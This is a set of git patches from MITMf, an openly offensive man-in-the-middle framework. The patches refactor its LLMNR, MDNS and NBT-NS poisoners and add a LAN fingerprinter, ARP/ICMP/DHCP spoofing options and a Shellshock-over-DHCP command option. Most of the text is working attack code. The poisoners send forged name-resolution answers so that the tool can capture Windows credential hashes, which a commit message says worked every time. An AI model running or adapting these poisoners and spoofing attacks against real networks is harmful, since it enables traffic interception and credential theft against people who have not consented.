IpTables.getInstance().Flush() + for protocol in self.protocolInstances: + protocol.start() - SystemConfig.setIpForwarding(0) + def add_options(self, options): + group = options.add_mutually_exclusive_group(required=False) + group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing') + group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') + group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') + options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries') + options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') + options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') + options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]') + options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') + + def finish(self): + for protocol in self.protocolInstances: + if hasattr(protocol, 'stop'): + protocol.stop() + + if not self.manualiptables: + IpTables.getInstance().Flush() + + SystemConfig.setIpForwarding(0) diff --git a/plugins/Upsidedownternet.py b/plugins/Upsidedownternet.py index 959f96c..402c9e5 100644 --- a/plugins/Upsidedownternet.py +++ b/plugins/Upsidedownternet.py @@ -23,8 +23,6 @@ from cStringIO import StringIO from plugins.plugin import Plugin from PIL import Image -mitmf_logger = logging.getLogger('mitmf') - class Upsidedownternet(Plugin): name = "Upsidedownternet" optname = "upsidedownternet" @@ -65,7 +63,7 @@ class Upsidedownternet(Plugin): im.save(output, format=image_type) data = output.getvalue() output.close() - mitmf_logger.info("%s Flipped image" % request.client.getClientIP()) + mitmf_logger.info("{} Flipped image".format(request.client.getClientIP())) except Exception as e: - mitmf_logger.info("%s Error: %s" % (request.client.getClientIP(), e)) + mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e)) return {'request': request, 'data': data} diff --git a/plugins/__init__.py b/plugins/__init__.py index 
5026fd4..155e900 100644 --- a/plugins/__init__.py +++ b/plugins/__init__.py @@ -3,4 +3,3 @@ import os import glob __all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")] - diff --git a/plugins/plugin.py b/plugins/plugin.py index b73486d..9befa33 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -2,9 +2,12 @@ The base plugin class. This shows the various methods that can get called during the MITM attack. ''' +from core.configwatcher import ConfigWatcher +import logging +mitmf_logger = logging.getLogger('mitmf') -class Plugin(object): +class Plugin(ConfigWatcher, object): name = "Generic plugin" optname = "generic" desc = "" @@ -15,6 +18,10 @@ class Plugin(object): '''Called if plugin is enabled, passed the options namespace''' self.options = options + def startThread(self, options): + '''Anything that will subclass this function will be a thread''' + return + def add_options(options): '''Add your options to the options parser''' raise NotImplementedError @@ -27,6 +34,10 @@ class Plugin(object): '''Handles outgoing request''' raise NotImplementedError + def pluginReactor(self, strippingFactory): + '''This sets up another instance of the reactor on a diffrent port''' + pass + def handleResponse(self, request, data): ''' Handles all non-image responses by default. See Upsidedownternet diff --git a/requirements.txt b/requirements.txt index aa31339..75fc1ad 100644 --- a/requirements.txt +++ b/requirements.txt @@ -14,5 +14,6 @@ ipy pyopenssl service_identity watchdog +impacket capstone pypcap From 7aad9879d1c02ea603e01ccf9d8a733d5a899974 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Mon, 27 Apr 2015 19:19:34 +0200 Subject: [PATCH 03/20] version bump in readme --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e07b1ce..be59559 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -MITMf V0.9.6 +MITMf V0.9.7 ============ Framework for Man-In-The-Middle attacks From 08b9029a96a94977d40f59ce6183b50f89d4ae32 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 28 Apr 2015 02:03:12 +0200 Subject: [PATCH 04/20] Responder's MDNS/LLMNR/NBTNS poisoners are back in action (better than ever), only WPAD remains. Tested against Windows 7 and 8, got hashes 100% of the time! \o/ The rest of the servers will be added in after WPAD is fixed. Next step is to fix the logging... frankly i rather just log everything into the main mitmf.log folder since it's very grep'able. 
Also the exact output is going to need tweaking, the lines are wayy to long --- .../fingerprinter/LANFingerprinter.py | 384 ++++++++++-------- .../fingerprinter/RAPLANMANPackets.py | 18 +- core/responder/llmnr/LLMNRPoisoner.py | 37 +- core/responder/mdns/MDNSPoisoner.py | 48 ++- .../responder/mdns/{__init.py => __init__.py} | 0 core/responder/nbtns/NBTNSPoisoner.py | 126 +++--- plugins/Responder.py | 10 +- 7 files changed, 327 insertions(+), 296 deletions(-) rename core/responder/mdns/{__init.py => __init__.py} (100%) diff --git a/core/responder/fingerprinter/LANFingerprinter.py b/core/responder/fingerprinter/LANFingerprinter.py index 3228f01..a1186f8 100644 --- a/core/responder/fingerprinter/LANFingerprinter.py +++ b/core/responder/fingerprinter/LANFingerprinter.py @@ -1,183 +1,221 @@ -################################################################################## -#Browser Listener and Lanman Finger -################################################################################## -class LANFinger(): +import socket +import threading +import struct +import logging - def serve_thread_udp(host, port, handler): - try: - server = ThreadingUDPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from core.responder.fingerprinter.RAPLANMANPackets import * - def start(): - t1 = threading.Thread(name="Browser", target=serve_thread_udp, args=("0.0.0.0", 138, Browser)) +mitmf_logger = logging.getLogger("mitmf") +class LANFingerprinter(): + + def start(self, options): + + global args; args = options #For now a quick hack to make argparse's namespace object available to all + + try: + mitmf_logger.debug("[LANFingerprinter] online") + server = ThreadingUDPServer(("0.0.0.0", 138), Browser) + t = threading.Thread(name="LANFingerprinter", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.error("[LANFingerprinter] Error starting on port 138: {}:".format(e)) + class ThreadingUDPServer(ThreadingMixIn, UDPServer): - allow_reuse_address = 1 + allow_reuse_address = 1 - def server_bind(self): - UDPServer.server_bind(self) - -def WorkstationFingerPrint(data): - Role = { - "\x04\x00" :"Windows 95", - "\x04\x10" :"Windows 98", - "\x04\x90" :"Windows ME", - "\x05\x00" :"Windows 2000", - "\x05\x00" :"Windows XP", - "\x05\x02" :"Windows 2003", - "\x06\x00" :"Windows Vista/Server 2008", - "\x06\x01" :"Windows 7/Server 2008R2", - } - - if data in Role: - return Role[data] - else: - return False - -def PrintServerName(data, entries): - if entries == 0: - pass - else: - entrieslen = 26*entries - chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries - ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size) ] - l =[] - for x in ServerName: - if WorkstationFingerPrint(x[16:18]): - l.append(x[:16].replace('\x00', '')+'\n [-]Os version is:%s'%(WorkstationFingerPrint(x[16:18]))) - else: - l.append(x[:16].replace('\x00', '')) - - return l - -def ParsePacket(Payload): - PayloadOffset = struct.unpack('i", len(''.join(payload))) return length -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, 
self.fields.values())) - - class SMBHeader(Packet): fields = OrderedDict([ ("proto", "\xff\x53\x4d\x42"), diff --git a/core/responder/llmnr/LLMNRPoisoner.py b/core/responder/llmnr/LLMNRPoisoner.py index 44b1b2d..4367753 100644 --- a/core/responder/llmnr/LLMNRPoisoner.py +++ b/core/responder/llmnr/LLMNRPoisoner.py @@ -24,11 +24,11 @@ class LLMNRPoisoner: try: mitmf_logger.debug("[LLMNRPoisoner] OURIP => {}".format(OURIP)) server = ThreadingUDPLLMNRServer(("0.0.0.0", 5355), LLMNR) - t = threading.Thread(name="LLMNR", target=server.serve_forever) #LLMNR + t = threading.Thread(name="LLMNRPoisoner", target=server.serve_forever) #LLMNR t.setDaemon(True) t.start() except Exception, e: - mitmf_logger.error("[LLMNRPoisoner] Error starting on port {}: {}:".format(5355, e)) + mitmf_logger.error("[LLMNRPoisoner] Error starting on port 5355: {}:".format(e)) class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer): @@ -97,11 +97,11 @@ class LLMNR(BaseRequestHandler): if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1])) + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1])) except Exception: - mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name)) + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {}".format(self.client_address[0], Name)) else: - mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name)) + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {}".format(self.client_address[0], Name)) if DontRespondToSpecificHost(DontRespondTo): if RespondToIPScope(DontRespondTo, self.client_address[0]): @@ -118,15 +118,11 @@ class LLMNR(BaseRequestHandler): buff.calculate() for x in range(1): soc.sendto(str(buff), self.client_address) - #mitmf_logger.info(Message) - mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name)) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0],Name)) if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) - #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) - mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0])) - mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1])) + mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1])) except Exception: mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) pass @@ -136,14 +132,11 @@ class LLMNR(BaseRequestHandler): buff.calculate() for x in range(1): soc.sendto(str(buff), self.client_address) - mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name)) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0],Name)) if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) - #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) - mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0])) - 
mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1])) + mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1])) except Exception: mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) pass @@ -154,14 +147,11 @@ class LLMNR(BaseRequestHandler): buff.calculate() for x in range(1): soc.sendto(str(buff), self.client_address) - mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name)) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0], Name)) if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) - #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) - mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0])) - mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1])) + mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1])) except Exception: mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) pass @@ -170,12 +160,11 @@ class LLMNR(BaseRequestHandler): buff.calculate() for x in range(1): soc.sendto(str(buff), self.client_address) - mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name)) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0], Name)) if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0])) - mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1])) + mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1])) except Exception: mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) pass diff --git a/core/responder/mdns/MDNSPoisoner.py b/core/responder/mdns/MDNSPoisoner.py index e8bbb77..eda54d1 100644 --- a/core/responder/mdns/MDNSPoisoner.py +++ b/core/responder/mdns/MDNSPoisoner.py @@ -1,22 +1,33 @@ #! 
/usr/bin/env python2.7 -from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler import threading +import socket import struct +import logging -from core.protocols.odict import OrderedDict -from core.protocols.packet import Packet +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from core.responder.odict import OrderedDict +from core.responder.packet import Packet +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class MDNSPoisoner(): - def start(): + def start(self, options, ourip): + + global args; args = options + global OURIP; OURIP = ourip + try: + mitmf_logger.debug("[MDNSPoisoner] OURIP => {}".format(OURIP)) server = ThreadingUDPMDNSServer(("0.0.0.0", 5353), MDNS) - t = threading.Thread(name="MDNS", target=server.serve_forever) + t = threading.Thread(name="MDNSPoisoner", target=server.serve_forever) t.setDaemon(True) t.start() except Exception, e: - print "Error starting MDNSPoisoner on port %s: %s:" % (str(port),str(e)) + print "[MDNSPoisoner] Error starting on port 5353: {}" .format(e) class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): @@ -26,9 +37,8 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): MADDR = "224.0.0.251" self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) - Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP)) - - UDPServer.server_bind(self + Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR)+ socket.inet_aton(OURIP)) + UDPServer.server_bind(self) class MDNSAns(Packet): fields = OrderedDict([ @@ -67,32 +77,34 @@ def Poisoned_MDNS_Name(data): class MDNS(BaseRequestHandler): def handle(self): + + ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder'] + RespondTo = ResponderConfig['RespondTo'] + MADDR = "224.0.0.251" MPORT = 5353 data, soc = self.request if self.client_address[0] == "127.0.0.1": pass try: - if AnalyzeMode: + if args.analyze: if Parse_IPV6_Addr(data): - #print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) - responder_logger.info('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + mitmf_logger.info('[MDNSPoisoner] {} is looking for: {}'.format(self.client_address[0],Parse_MDNS_Name(data))) if RespondToSpecificHost(RespondTo): - if AnalyzeMode == False: + if args.analyze == False: if RespondToIPScope(RespondTo, self.client_address[0]): if Parse_IPV6_Addr(data): - #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) - responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + + mitmf_logger.info('[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0],Parse_MDNS_Name(data))) Name = Poisoned_MDNS_Name(data) MDns = MDNSAns(AnswerName = Name) MDns.calculate() soc.sendto(str(MDns),(MADDR,MPORT)) - if AnalyzeMode == False and RespondToSpecificHost(RespondTo) == False: + if args.analyze == False and RespondToSpecificHost(RespondTo) == False: if Parse_IPV6_Addr(data): - #print 'MDNS poisoned answer sent to this IP: %s. 
The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) - responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + mitmf_logger.info('[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0],Parse_MDNS_Name(data))) Name = Poisoned_MDNS_Name(data) MDns = MDNSAns(AnswerName = Name) MDns.calculate() diff --git a/core/responder/mdns/__init.py b/core/responder/mdns/__init__.py similarity index 100% rename from core/responder/mdns/__init.py rename to core/responder/mdns/__init__.py diff --git a/core/responder/nbtns/NBTNSPoisoner.py b/core/responder/nbtns/NBTNSPoisoner.py index 1d4c071..f67160f 100644 --- a/core/responder/nbtns/NBTNSPoisoner.py +++ b/core/responder/nbtns/NBTNSPoisoner.py @@ -1,18 +1,34 @@ #! /usr/bin/env python2.7 -from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler import threading +import socket import struct +import logging +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from core.responder.fingerprinter.Fingerprint import RunSmbFinger +from core.responder.odict import OrderedDict from core.responder.packet import Packet +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class NBTNSPoisoner(): - def start(): - server = ThreadingUDPServer(("0.0.0.0", 137), NB) - t = threading.Thread(name="NBNS", target=server.serve_forever()) #NBNS - t.setDaemon(True) - t.start() + def start(self, options, ourip): + + global OURIP; OURIP = ourip + global args; args = options + + try: + mitmf_logger.debug("[NBTNSPoisoner] OURIP => {}".format(ourip)) + server = ThreadingUDPServer(("0.0.0.0", 137), NB) + t = threading.Thread(name="NBTNSPoisoner", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.debug("[NBTNSPoisoner] Error starting on port 137: {}".format(e)) class ThreadingUDPServer(ThreadingMixIn, UDPServer): @@ -42,17 +58,17 @@ class NBT_Ans(Packet): def calculate(self,data): self.fields["Tid"] = data[0:2] self.fields["NbtName"] = data[12:46] - self.fields["IP"] = inet_aton(OURIP) + self.fields["IP"] = socket.inet_aton(OURIP) def NBT_NS_Role(data): Role = { - "\x41\x41\x00":"Workstation/Redirector Service.", - "\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller or a homegroup.)", - "\x42\x4d\x00":"Domain controller service. This name is a domain controller.", - "\x42\x4e\x00":"Local Master Browser.", - "\x42\x4f\x00":"Browser Election Service.", - "\x43\x41\x00":"File Server Service.", - "\x41\x42\x00":"Browser Service.", + "\x41\x41\x00":"Workstation/Redirector Service", + "\x42\x4c\x00":"Domain Master Browser", + "\x42\x4d\x00":"Domain controller service", + "\x42\x4e\x00":"Local Master Browser", + "\x42\x4f\x00":"Browser Election Service", + "\x43\x41\x00":"File Server Service", + "\x41\x42\x00":"Browser Service", } if data in Role: @@ -62,13 +78,13 @@ def NBT_NS_Role(data): # Define what are we answering to. def Validate_NBT_NS(data,Wredirect): - if AnalyzeMode: + if args.analyze: return False if NBT_NS_Role(data[43:46]) == "File Server Service.": return True - if NBTNSDomain == True: + if args.nbtns == True: if NBT_NS_Role(data[43:46]) == "Domain controller service. 
This name is a domain controller.": return True @@ -96,6 +112,13 @@ def Decode_Name(nbname): class NB(BaseRequestHandler): def handle(self): + + ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder'] + DontRespondTo = ResponderConfig['DontRespondTo'] + DontRespondToName = ResponderConfig['DontRespondToName'] + RespondTo = ResponderConfig['RespondTo'] + RespondToName = ResponderConfig['RespondToName'] + data, socket = self.request Name = Decode_Name(data[13:45]) @@ -106,59 +129,46 @@ class NB(BaseRequestHandler): if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()): return None - if AnalyzeMode: + if args.analyze: if data[2:4] == "\x01\x10": - if Is_Finger_On(Finger_On_Off): + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1]) - logger3.warning(Message) + mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested: {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1])) except Exception: - Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) - logger3.warning(Message) + mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}".format(self.client_address[0], Name, NBT_NS_Role(data[43:46]))) else: - Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) - logger3.warning(Message) + mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}".format(self.client_address[0], Name, NBT_NS_Role(data[43:46]))) - if RespondToSpecificHost(RespondTo) and AnalyzeMode == False: + if RespondToSpecificHost(RespondTo) and args.analyze == False: if RespondToIPScope(RespondTo, self.client_address[0]): if data[2:4] == "\x01\x10": - if Validate_NBT_NS(data,Wredirect): + if Validate_NBT_NS(data,args.wredir): if RespondToSpecificName(RespondToName) == False: buff = NBT_Ans() buff.calculate(data) for x in range(1): socket.sendto(str(buff), self.client_address) - Message = 'NBT-NS Answer sent to: %s. 
The requested name was : %s'%(self.client_address[0], Name) - #responder_logger.info(Message) - logger2.warning(Message) - if Is_Finger_On(Finger_On_Off): + mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name)) + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) - responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1])) except Exception: - responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): buff = NBT_Ans() buff.calculate(data) for x in range(1): socket.sendto(str(buff), self.client_address) - Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) - #responder_logger.info(Message) - logger2.warning(Message) - if Is_Finger_On(Finger_On_Off): + mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name)) + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) - responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1])) except Exception: - responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass @@ -167,42 +177,32 @@ class NB(BaseRequestHandler): else: if data[2:4] == "\x01\x10": - if Validate_NBT_NS(data,Wredirect) and AnalyzeMode == False: + if Validate_NBT_NS(data,args.wredir) and args.analyze == False: if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): buff = NBT_Ans() buff.calculate(data) for x in range(1): socket.sendto(str(buff), self.client_address) - Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) - #responder_logger.info(Message) - logger2.warning(Message) - if Is_Finger_On(Finger_On_Off): + mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name)) + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) - responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1])) except Exception: - responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) == False: buff = NBT_Ans() buff.calculate(data) for x in range(1): socket.sendto(str(buff), self.client_address) - Message = 'NBT-NS Answer sent to: %s. 
The requested name was : %s'%(self.client_address[0], Name) - #responder_logger.info(Message) - logger2.warning(Message) - if Is_Finger_On(Finger_On_Off): + mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name)) + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) - responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1])) except Exception: - responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass \ No newline at end of file diff --git a/plugins/Responder.py b/plugins/Responder.py index 676553f..b83891a 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -24,9 +24,12 @@ import threading from plugins.plugin import Plugin from twisted.internet import reactor -from core.responder.wpad.WPADPoisoner import WPADPoisoner -from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner from core.utils import SystemConfig +from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner +from core.responder.wpad.WPADPoisoner import WPADPoisoner +from core.responder.mdns.MDNSPoisoner import MDNSPoisoner +from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner +from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter class Responder(Plugin): name = "Responder" @@ -48,6 +51,9 @@ class Responder(Plugin): sys.exit('[-] Error parsing config for Responder: ' + str(e)) LLMNRPoisoner().start(options, self.ourip) + MDNSPoisoner().start(options, self.ourip) + NBTNSPoisoner().start(options, self.ourip) + LANFingerprinter().start(options) if options.wpad: WPADPoisoner().start() From 2c6e9a31b7a8b2feafc8f05be9c2ac1e1cb264a0 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 28 Apr 2015 13:08:56 +0200 Subject: [PATCH 05/20] modded readme --- README.md | 36 ++++++++++++++++-------------------- 1 file changed, 16 insertions(+), 20 deletions(-) diff --git a/README.md b/README.md index be59559..126f226 100644 --- a/README.md +++ b/README.md @@ -9,26 +9,6 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox **Before submitting issues please read the [FAQ](#faq) and the appropriate [section](#submitting-issues).** -(Another) Dependency change! -============================ -As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required. - -How to install on Kali -====================== - -```apt-get install mitmf``` - -**Currently Kali has a very old version of MITMf in it's repos so if you find bugs its normal, don't open an issue! Read the [Installation](#installation) section to get the latest version** - -Installation -============ -If MITMf is not in your distros repo or you just want the latest version: -- clone this repository -- run the ```setup.sh``` script -- run the command ```pip install -r requirements.txt``` to install all python dependencies - -On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pypcap``` to fix it. 
- Availible plugins ================= - Responder - LLMNR, NBT-NS and MDNS poisoner @@ -76,6 +56,22 @@ Changelog - Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html) +Installation +============ +If MITMf is not in your distros repo or you just want the latest version: +- clone this repository +- run the ```setup.sh``` script +- run the command ```pip install -r requirements.txt``` to install all python dependencies + +On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pypcap``` to fix it. + +How to install on Kali +====================== + +```apt-get install mitmf``` + +**Currently Kali has a very old version of MITMf in it's repos so if you find bugs its normal, don't open an issue! Read the [Installation](#installation) section to get the latest version** + Submitting Issues ================= If you have *questions* regarding the framework please email me at byt3bl33d3r@gmail.com From 6b421d1cac74cf06eff7577ad37d8cb70d7fcdef Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 28 Apr 2015 13:10:36 +0200 Subject: [PATCH 06/20] typo --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 126f226..73ca447 100644 --- a/README.md +++ b/README.md @@ -20,7 +20,7 @@ Availible plugins 